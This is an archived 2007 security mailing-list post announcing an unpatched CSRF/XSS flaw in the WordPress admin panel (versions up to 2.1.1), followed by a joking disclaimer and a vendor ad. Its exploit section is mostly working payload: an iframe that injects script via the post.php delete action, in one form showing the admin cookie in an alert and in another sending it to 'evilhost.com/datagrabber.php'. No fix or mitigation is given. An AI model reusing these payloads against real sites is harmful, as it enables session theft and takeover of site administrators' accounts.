WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

WordPress AdminPanel CSRF/XSS - 0day

From: SaMuschie <samuschie () yahoo de>
Date: Mon, 26 Feb 2007 21:50:57 +0100 (CET)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+---------------------------------------------------------------------------+
|               SaMuschie Research Labs proudly presents . . .              |  
+---------------------------------------------------------------------------+
| Application: wordpress                            Version: <= 2.1.1       |  
| Vuln./Exploit Type: AdminPanel CSRF/XSS           Status: 0day            |  
+---------------------------------------------------------------------------+
| Discovered by: Samenspender                       Released: 20070226      |  
| SaMuschie Release Number: 1                                               |  
+---------------------------------------------------------------------------+

Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie send to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27&apos;></iframe>

+---------------------------------------------------------------------------+
|                           Lameness Disclaimer                             |  
+---------------------------------------------------------------------------+
| SaMuschie Research Labs was found to publish vulnerabilities within well  |  
| known software products, which are easy to discover and exploit.          |  
|                                                                           |  
| SaMuschie researchers just spend a minimum of time and knowledge for each |
| vulnerability. Hence readers of this advisory are requested not to ask    |  
| any questions to the researchers.... they don't know the answer ;)        |  
+---------------------------------------------------------------------------+
+---------------------------------------------------------------------------+
| EOF                                                                       |  
+---------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h
aFgDpHnxPP+/4Ot5bLBZy9Q=
=/gS4
-----END PGP SIGNATURE-----





        
                
___________________________________________________________ 
Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de

-------------------------------------------------------------------------
Sponsored by: Watchfire

The Twelve Most Common Application-level Hack Attacks
Hackers continue to add billions to the cost of doing business online 
despite security executives' efforts to prevent malicious attacks. This 
whitepaper identifies the most common methods of attacks that we have seen, 
and outlines a guideline for developing secure web applications. 
Download today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHe
--------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: